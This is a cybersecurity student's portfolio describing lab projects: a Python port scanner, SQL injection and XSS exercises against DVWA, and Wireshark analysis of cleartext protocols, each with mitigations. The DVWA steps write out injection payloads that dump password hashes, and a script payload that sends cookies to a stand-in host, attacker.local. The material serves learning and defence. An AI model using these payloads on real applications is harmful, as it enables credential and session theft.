Cybersecurity Student | Aspiring Security Analyst
B.Tech Computer Science student with hands-on focus in network security, web application testing, and Linux-based environments. Builds and documents practical security labs using industry-standard tools including Nmap, Wireshark, and Burp Suite.
Actively practices vulnerability identification through CTF challenges and intentionally vulnerable application environments (DVWA, TryHackMe labs). Work is reproducible, documented, and GitHub-hosted.
Target roles: SOC Analyst, Security Analyst, Junior Penetration Tester.
Currently pursuing a B.Tech in Computer Science with a self-directed specialization in cybersecurity. Academic coursework covers data structures, operating systems, computer networks, and cryptography — supplemented by independent lab work that ties theory to practical security scenarios.
The approach is simulation-first: every concept is tested in a controlled lab environment before being documented. This includes spinning up intentionally vulnerable applications, capturing and analyzing live network traffic, and writing Python scripts for task automation and basic security tooling.
Security work is informed by the assumption that understanding attack mechanics is prerequisite to meaningful defense. Labs are designed around real vulnerability classes, not academic abstraction.
Host discovery, port scanning, service enumeration, traffic capture and analysis. Working knowledge of TCP/IP stack behavior, common protocols, and how misconfigurations expose services.
Testing for injection flaws, authentication weaknesses, and client-side vulnerabilities using DVWA and OWASP guidelines. Proficient with Burp Suite for intercepting and modifying HTTP traffic.
Symmetric and asymmetric encryption principles, hashing algorithms, and common misuse patterns (e.g., MD5 for passwords, ECB mode block ciphers). Applied understanding via CTF crypto challenges.
CTF platforms (TryHackMe, PicoCTF), controlled lab environments (Kali Linux, DVWA), hands-on replication of documented CVEs, and structured write-up documentation for every completed exercise.
All projects are conducted in isolated lab environments. No unauthorized scanning or testing.
Network reconnaissance is the first stage of any security assessment. Before an attacker or a defender can evaluate exposure, they need to know which hosts are reachable and which services are listening. Understanding how port scanning works at the socket level — not just as a black-box tool — is foundational for both offensive and defensive roles. Nmap abstracts most of this; building a scanner from scratch exposes the underlying mechanics.
Steps:
1. Create a TCP socket with socket.AF_INET, socket.SOCK_STREAM. Set a connection timeout (default 1 second) to prevent indefinite blocking on filtered ports.
2. Call socket.connect_ex((host, port)); it returns 0 if the TCP handshake completes (port open) and non-zero on refusal or timeout.
3. On open ports, call socket.recv(1024) to retrieve the service banner. Decode and strip the response.
Observation: vsFTPd 2.3.4 is a well-known backdoored version (CVE-2011-2523). The scanner identified it via banner; this finding would trigger targeted follow-up in a real assessment.
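The three steps above, as an added example that is not the portfolio's own scanner script: a minimal connect scanner with banner grabbing, plus a throwaway listener on 127.0.0.1 that greets clients with a constructed banner, so the scanner can be exercised inside a lab with no external target. The listener, its banner text and the helper names are assumptions made for this example.

```python
import socket
import threading

# Added example, not the portfolio's own scanner script: a minimal TCP connect
# scanner with banner grabbing, plus a throwaway local listener so the scanner
# can be exercised against 127.0.0.1 in a lab without any external target.


def scan_port(host, port, timeout=1.0):
    """Return (state, banner): state is 'open' or 'closed'; banner is the first
    line the service volunteers after the handshake, or '' if it says nothing."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)                   # never block forever on a filtered port
        if s.connect_ex((host, port)) != 0:     # 0 only when the TCP handshake completed
            return "closed", ""
        try:
            banner = s.recv(1024).decode(errors="replace").strip()
        except socket.timeout:
            banner = ""                         # open, but the service waits for the client to speak
        return "open", banner


def scan_ports(host, ports, timeout=1.0):
    """Scan each port in turn and map port -> (state, banner)."""
    return {port: scan_port(host, port, timeout) for port in ports}


def leaked_banners(results):
    """Defender's view of the results: open ports whose banner reveals product or
    version information to an unauthenticated client, which is exactly what
    banner suppression is meant to remove."""
    return {port: banner for port, (state, banner) in results.items()
            if state == "open" and banner}


def start_banner_listener(banner, host="127.0.0.1"):
    """Start a background listener on an ephemeral port that greets every client
    with a constructed banner. Returns (port, server_socket)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:            # server socket closed: stop serving
                return
            with conn:
                conn.sendall(banner.encode() + b"\r\n")

    threading.Thread(target=serve, daemon=True).start()
    return port, srv


def free_port(host="127.0.0.1"):
    """Bind to port 0, read back the kernel-assigned port and release it: that
    port is almost certainly closed when scanned a moment later."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    # Constructed lab banner; a real service leaks its version string the same way.
    port, srv = start_banner_listener("220 constructed-ftpd 0.1 ready")
    results = scan_ports("127.0.0.1", [port, free_port()], timeout=2.0)
    for p, (state, banner) in sorted(results.items()):
        print(f"{p}/tcp {state} {banner}")
    print("banners leaking version info:", leaked_banners(results))
    srv.close()
```

The timeout is what keeps a sweep over filtered ports bounded: a dropped SYN never gets a RST, so without it connect_ex would wait for the OS-level connect timeout on every such port. leaked_banners is the defender's read of the same output; an empty dict after banner suppression and patching is the state the mitigations below aim for.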
Port scanning itself is not an attack — it is observation. The vulnerability is not in the scanning technique but in the services discovered. Running outdated, unpatched services (vsFTPd 2.3.4, OpenSSH 4.7) on network-accessible ports with no access control is the actual exposure. The scanner simply maps what is already visible.
Restrict externally reachable ports to only those required (principle of least exposure). Suppress or modify service banners to remove version information from unauthenticated access. Implement network-level firewall rules (iptables / nftables) to allowlist source IPs for management ports (22, 23, 3306). Update all running services to current supported versions. Monitor for scan traffic using IDS signatures for SYN-only sweep patterns.
Injection vulnerabilities remain consistently in the OWASP Top 3 despite being well-understood and preventable. The gap is not awareness but application: developers often fail to enforce input validation and parameterized queries consistently. Cross-site scripting persists for the same reason — insufficient output encoding. This lab replicates both vulnerability classes from first principles to build a tester's mental model of how they work mechanically.
SQL injection:
1. Enter ' (a single quote) into the User ID field. Observe the MySQL error message, which confirms the string is interpolated directly into a query.
2. Determine the column count with ORDER BY increments (1' ORDER BY 1--, then 2, then 3) until an error occurs. Column count = last successful ordinal.
3. Submit 1' UNION SELECT null,database()-- to return the current database name in the output field.
4. Enumerate tables with 1' UNION SELECT table_name,null FROM information_schema.tables WHERE table_schema=database()--
5. Submit 1' UNION SELECT user,password FROM users-- to retrieve MD5-hashed passwords. Identify the hash type and attempt an offline crack using a wordlist.
Cross-site scripting:
1. Submit <script>alert('XSS')</script> into the name parameter. Observe whether the script tag is reflected back unencoded and executes in the browser.
2. Submit <script>document.location='http://attacker.local/?c='+document.cookie</script> to demonstrate how an attacker would exfiltrate session tokens.
3. Submit <img src=x onerror=alert(1)> and other event-handler injections to demonstrate that blocklisting tag names is insufficient.
Both vulnerabilities exist because user-supplied input is treated as trusted data. In SQL injection, the input is concatenated directly into a query string, allowing structural modification of the query logic. In XSS, the input is reflected or stored and then rendered as HTML without encoding, allowing the browser to interpret it as executable code. These are fundamentally the same root cause: inadequate separation of data and instructions.
SQL Injection: Use parameterized queries or prepared statements in all database interactions — never string-concatenate user input into SQL. Apply least-privilege database accounts (application user should not have DROP or schema-access rights). Implement a WAF as a secondary layer, not a primary control.
XSS: HTML-encode all user-supplied output at render time using context-aware encoding (HTML body vs. attribute vs. JavaScript context require different encoders). Implement a strict Content-Security-Policy header to block inline script execution. Set HttpOnly and Secure flags on session cookies to prevent JavaScript access.
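The root cause and the two mitigations above, as an added example that is not code from the DVWA lab: the query-concatenation pattern that makes the User ID field injectable beside its parameterized form, and a tag-name blocklist beside context-aware output encoding. The users table is constructed here in an in-memory SQLite database to stand in for DVWA's MySQL one, and all function names are assumptions made for this example.

```python
import html
import sqlite3

# Added example, not code from the DVWA lab: the query-concatenation pattern
# that makes the User ID field injectable, beside its parameterized form, and
# the output encoding that stops reflected input from being parsed as HTML.
# The users table is constructed here (SQLite in memory) to stand in for DVWA's.


def make_lab_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "constructed-hash-1"), (2, "gordonb", "constructed-hash-2")])
    return conn


def lookup_vulnerable(conn, user_id):
    # Data and instructions mixed: the input is pasted into the SQL text, so a
    # quote ends the literal and whatever follows becomes query structure.
    query = f"SELECT first_name FROM users WHERE user_id = '{user_id}'"
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn, user_id):
    # Placeholder binding: the value travels separately from the statement and
    # can only ever be compared as data, never parsed as SQL.
    rows = conn.execute("SELECT first_name FROM users WHERE user_id = ?", (user_id,))
    return [row[0] for row in rows]


def render_vulnerable(name):
    # Reflected without encoding: the browser parses the input as markup.
    return f"<p>Hello {name}</p>"


def render_blocklisted(name):
    # Blocklisting one tag name: anything other than a literal <script> tag
    # (an <img> with an event handler, for instance) passes straight through.
    return f"<p>Hello {name.replace('<script>', '').replace('</script>', '')}</p>"


def render_safe_body(name):
    # HTML body context: escape & < > and both quote characters at render time.
    return f"<p>Hello {html.escape(name, quote=True)}</p>"


def render_safe_attribute(name):
    # Attribute context: the value must be quoted and have quotes escaped, so
    # the input cannot close the attribute and start a new one.
    return f'<input name="name" value="{html.escape(name, quote=True)}">'


if __name__ == "__main__":
    db = make_lab_db()
    tautology = "1' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(db, tautology))   # every user
    print("safe:      ", lookup_safe(db, tautology))         # nothing matches
    probe = "<img src=x onerror=alert(1)>"
    print(render_blocklisted(probe))
    print(render_safe_body(probe))
```

The tautology input is the simplest way to see the difference: concatenated, it changes the WHERE clause and returns every row; bound as a parameter, it is compared as a text value against user_id and matches nothing. The same separation applies on the output side, where html.escape does not try to recognise dangerous tags at all and instead makes every input character inert in the context it is rendered into.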
Network traffic contains a significant amount of information about system behavior, active sessions, and in some cases, plaintext credentials. SOC analysts and network defenders rely on packet analysis to detect anomalies, investigate incidents, and understand attack timelines. This project builds the skill of reading raw pcap data — identifying protocol structure, filtering for relevant streams, and extracting meaningful forensic artifacts from captured traffic.
Steps:
1. Apply the capture filter host 192.168.56.101 to reduce noise and limit capture to target traffic only.
2. Apply the display filter ftp. Locate the USER and PASS commands in the packet list; these transmit in plaintext. Verify the username and password are directly visible in the packet payload field.
3. Apply the display filter http.request.method == "POST" to isolate form submissions. Right-click a relevant packet → Follow → TCP Stream. View the full HTTP request including the POST body containing form field data.
4. Apply the display filter tcp.flags.syn==1 && tcp.flags.ack==0 to display SYN-only packets. Observe the pattern: rapid sequential SYN packets to incrementing port numbers from one source IP, the characteristic scan signature.
5. Apply the display filter telnet. Note that each keypress is transmitted as an individual packet. Use Follow TCP Stream to reconstruct the full session including login credentials and commands entered.
Cleartext protocols (FTP, Telnet, HTTP without TLS) expose credentials and session content to any host that can observe the network path, whether that is via ARP poisoning on a local segment, a compromised network device, or an insider position. The data is not hidden; it is simply in transit. This exercise demonstrates that encryption is not an optional enhancement; it is the baseline control for any communication carrying sensitive data.
Replace FTP with SFTP or FTPS; replace Telnet with SSH; enforce HTTPS on all web applications. On internal networks, implement 802.1X port authentication to restrict unauthorized devices from tapping switch segments. Use network monitoring tools (Zeek, Suricata) to alert on cleartext credential patterns and anomalous scan traffic. Disable cleartext management protocols entirely at the device/OS level where feasible.
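The monitoring side of these mitigations, and of the IDS signature for SYN-only sweeps recommended in the port scanner project, as an added example that is not part of the Wireshark lab or of any real tool: the two patterns found by hand with display filters above (SYN-only sweeps and cleartext credentials) written as detection logic over a constructed, simplified packet summary. The record layout (time|src|dst|dport|flags|payload), the sample addresses and the thresholds are assumptions made for this example.

```python
from collections import defaultdict

# Added example, not part of the Wireshark lab or of any real tool: the two
# patterns identified by hand with display filters (SYN-only sweeps and
# cleartext credentials) written as detection logic over a constructed,
# simplified packet summary. The record layout time|src|dst|dport|flags|payload
# is an assumption made for this example.

CONSTRUCTED_CAPTURE = """\
1.000|10.0.0.5|192.168.56.101|21|S|
1.002|10.0.0.5|192.168.56.101|22|S|
1.004|10.0.0.5|192.168.56.101|23|S|
1.006|10.0.0.5|192.168.56.101|25|S|
1.008|10.0.0.5|192.168.56.101|80|S|
1.010|10.0.0.5|192.168.56.101|443|S|
1.012|10.0.0.5|192.168.56.101|3306|S|
2.000|192.168.56.1|192.168.56.101|21|S|
2.050|192.168.56.1|192.168.56.101|21|PA|USER labuser
2.080|192.168.56.1|192.168.56.101|21|PA|PASS constructed-pass
9.000|192.168.56.1|192.168.56.101|80|S|
9.050|192.168.56.1|192.168.56.101|80|PA|POST /login.php username=labuser&password=constructed-pass
"""


def parse_capture(text):
    """Parse one record per line into dicts; blank lines are skipped."""
    packets = []
    for line in text.splitlines():
        if not line.strip():
            continue
        t, src, dst, dport, flags, payload = line.split("|", 5)
        packets.append({"time": float(t), "src": src, "dst": dst,
                        "dport": int(dport), "flags": flags, "payload": payload})
    return packets


def detect_syn_sweep(packets, min_ports=5, window=1.0):
    """Flag a source that sends SYN-only segments to at least min_ports distinct
    destination ports within any `window` seconds. This is the
    tcp.flags.syn==1 && tcp.flags.ack==0 pattern with a rate threshold added,
    so a normal client opening a couple of connections is not flagged."""
    by_src = defaultdict(list)
    for p in packets:
        if p["flags"] == "S":                      # SYN set, ACK clear
            by_src[p["src"]].append((p["time"], p["dport"]))
    alerts = []
    for src, events in by_src.items():
        events.sort()
        best = 0
        for i in range(len(events)):
            ports = set()
            for t, port in events[i:]:
                if t - events[i][0] > window:
                    break
                ports.add(port)
            best = max(best, len(ports))
        if best >= min_ports:
            alerts.append(("syn_sweep", src, best))
    return alerts


def detect_cleartext_credentials(packets):
    """Flag credential material carried by cleartext protocols: FTP USER/PASS
    commands on port 21 and HTTP POST bodies on port 80 carrying a password
    field. Only the command is recorded, never the secret itself, so the alert
    log does not become a second copy of the leaked password."""
    alerts = []
    for p in packets:
        payload = p["payload"]
        command = payload.split(" ", 1)[0]
        if p["dport"] == 21 and command in ("USER", "PASS"):
            alerts.append(("cleartext_credential", p["src"], "ftp", command))
        elif p["dport"] == 80 and command == "POST" and "password=" in payload:
            alerts.append(("cleartext_credential", p["src"], "http", "POST"))
    return alerts


def analyse(text):
    packets = parse_capture(text)
    return detect_syn_sweep(packets) + detect_cleartext_credentials(packets)


if __name__ == "__main__":
    for alert in analyse(CONSTRUCTED_CAPTURE):
        print(alert)
```

Against the constructed capture, 10.0.0.5 is reported as a sweep (seven distinct ports inside one second) while 192.168.56.1, which only opened two connections seven seconds apart, is not; the same legitimate client is what produces the three cleartext-credential alerts, which is the point of the exercise: the protocol, not the behaviour, is the exposure. In a production sensor the thresholds would be tuned per network, and the alert for a cleartext credential would drive the protocol replacement listed above rather than an investigation of the client.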
All project work is hosted publicly on GitHub. Each repository follows a consistent documentation standard so that work is reproducible and reviewable by anyone evaluating this portfolio.
Every project includes the full, commented source code. Python scripts are structured with clear function separation and inline documentation explaining security-relevant logic decisions.
Each repository contains a detailed README covering: setup instructions, tool requirements, execution steps, expected outputs, and a brief explanation of the vulnerability or concept demonstrated.
Terminal output, Wireshark captures, Burp Suite intercepts, and tool results are captured and stored in a dedicated /screenshots directory within each repository.
For each project, a structured write-up in Markdown covers the problem, methodology, findings, and mitigations — formatted for readability and usable as a reference during technical interviews.
Completed CTF challenge write-ups (PicoCTF, TryHackMe) are documented with step-by-step solution breakdowns, covering categories: web, crypto, forensics, and binary exploitation basics.
Virtual machine configurations, network topology diagrams, and tool version details are included so any evaluator can reproduce the exact lab environment used for each project.
Actively completing rooms across tracks: Pre-Security, Jr Penetration Tester, SOC Level 1. Focus on hands-on lab environments rather than video-only content.
Completed challenges in web exploitation, cryptography, and forensics categories. Each solved challenge is documented with a write-up in the GitHub repository.
Working through introductory machines to build familiarity with the HTB platform and enumeration-to-foothold workflow in a more open-ended format than guided rooms.
Local instance used to practice all OWASP Top 10 categories across low, medium, and high security levels. Current status: SQLi, XSS, CSRF, File Inclusion completed.
Intentionally vulnerable Linux VM used as a scanning and exploitation target for port scanner testing, Wireshark analysis, and basic service enumeration exercises.
Daily use of Kali Linux as the primary working environment. Practice includes file permission manipulation, bash scripting, process inspection, and log file analysis.
Self-studying using Professor Messer's free course materials and practice exams. Target exam date: [Month, Year]. Topics covered: threats, vulnerabilities, architecture, implementation, governance.
Structured learning path covering reconnaissance, web application testing, network exploitation, and basic privilege escalation. Current completion: ~60%.
Used as the primary reference for web application testing methodology. Each test case in the DVWA lab maps to a corresponding OTG section.
Technical guide for information security testing — referenced for understanding assessment planning, execution phases, and reporting structure used in professional engagements.
Regularly reviewed to understand real vulnerability disclosures. Practice involves reading CVE descriptions and attempting to understand the technical root cause and exploitation method.
Available for internships, entry-level security roles, and collaborative CTF practice. GitHub is the best place to review work directly. Response time for email inquiries: within 24 hours on weekdays.
Location: Vadodara, Gujarat | Freelance Developer (Python / Web [Frontend, Backend]) | Remote | Available Part-Time